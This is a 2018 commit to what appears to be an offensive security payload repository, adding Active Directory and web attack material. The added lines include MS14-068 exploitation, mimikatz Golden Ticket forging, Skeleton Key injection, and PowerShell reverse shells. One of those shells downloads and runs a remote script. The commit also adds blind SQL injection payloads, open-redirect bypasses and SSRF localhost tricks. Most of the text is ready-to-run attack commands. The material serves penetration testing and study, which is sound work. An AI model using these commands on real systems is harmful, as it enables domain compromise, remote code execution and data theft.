AD Attack - Golden Ticket + SQL/OpenRed/SSRF

This commit is contained in:
Swissky 2018-04-12 23:23:41 +02:00
parent 354d94219e
commit b8fbca3347
8 changed files with 92 additions and 9 deletions

View File

@ -6,6 +6,11 @@
Exploit Python: https://www.exploit-db.com/exploits/35474/
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
git clone https://github.com/bidord/pykek
python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
```
* MS17-010 (Eternal Blue - Local Admin)
```c
@ -41,8 +46,24 @@
```
* Golden Tickets
```c
mimikatz
kerberos::ptc tgt.bin
Get info - Mimikatz
lsadump::dcsync /user:krbtgt
lsadump::lsa /inject /name:krbtgt
Get info - Meterpreter(kiwi)
dcsync_ntlm krbtgt
Forge a Golden ticket - Mimikatz
kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
kerberos::tgt
Forge a Golden ticket - Metasploit
post/windows/escalate/golden_ticket
Forge a Golden ticket - Meterpreter
load kiwi
golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
kerberos_ticket_use /root/Downloads/pentestlabuser.tck
```
* Kerberoast
```c
@ -120,3 +141,4 @@ net group "Domain Admins" hacker2 /add /domain
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
* [Road to DC](https://steemit.com/infosec/@austinhudson/road-to-dc-part-1)
* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288)
* [Golden ticket](https://pentestlab.blog/2018/04/09/golden-ticket/)

View File

@ -72,6 +72,11 @@ Powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
```powershell
powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
```

View File

@ -22,6 +22,16 @@ Mimikatz Golden ticket
.\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
```
Mimikatz Skeleton key
```
privilege::debug
misc::skeleton
# map the share
net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
# login as someone
rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
```
## Mimikatz commands
@ -62,3 +72,4 @@ More informations can be grabbed from the Memory with :
## Thanks to
* [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
* [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)

View File

@ -10,6 +10,10 @@ WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELIS
```
## Exploitation
Using a whitelisted domain or keyword
```
www.whitelisted.com.evil.com redirect to evil.com
```
Using CRLF to bypass "javascript" blacklisted keyword
```

View File

@ -78,3 +78,4 @@ EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
## Thanks to
* [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
* [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)

View File

@ -48,6 +48,21 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
```
## MYSQL Blind using a conditional statement
TRUE: `if @@version starts with a 5`:
```
2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
Response:
HTTP/1.1 500 Internal Server Error
```
False: `if @@version starts with a 4`:
```
2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
Response:
HTTP/1.1 200 OK
```
## MYSQL Blind with MAKE_SET
```
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)

View File

@ -4,27 +4,45 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via t
## Entry point detection
Detection of an SQL injection entry point
Simple characters
```
'
"
%27
" / %22
; / %3B
"
%22
#
%23
;
%3B
)
Wildcard (*)
```
Multiple encoding
```
%%2727
%25%27
```
Merging characters
```
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP
```
Weird characters
```
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')
Wildcard (*)
```
## SQL injection using SQLmap
Basic arguments for SQLmap
```
@ -329,6 +347,8 @@ mysql> mysql> select version();
## Thanks to - Other resources
* Detect SQLi
- [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
* MySQL:
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)

View File

@ -61,6 +61,11 @@ Bypass localhost with a domain redirecting to locahost
```
http://localtest.me
http://n-pn.info
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
```
The service nip.io is awesome for that, it will convert any ip address as a dns.
```
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
```
Bypass localhost with CIDR : 127.x.x.x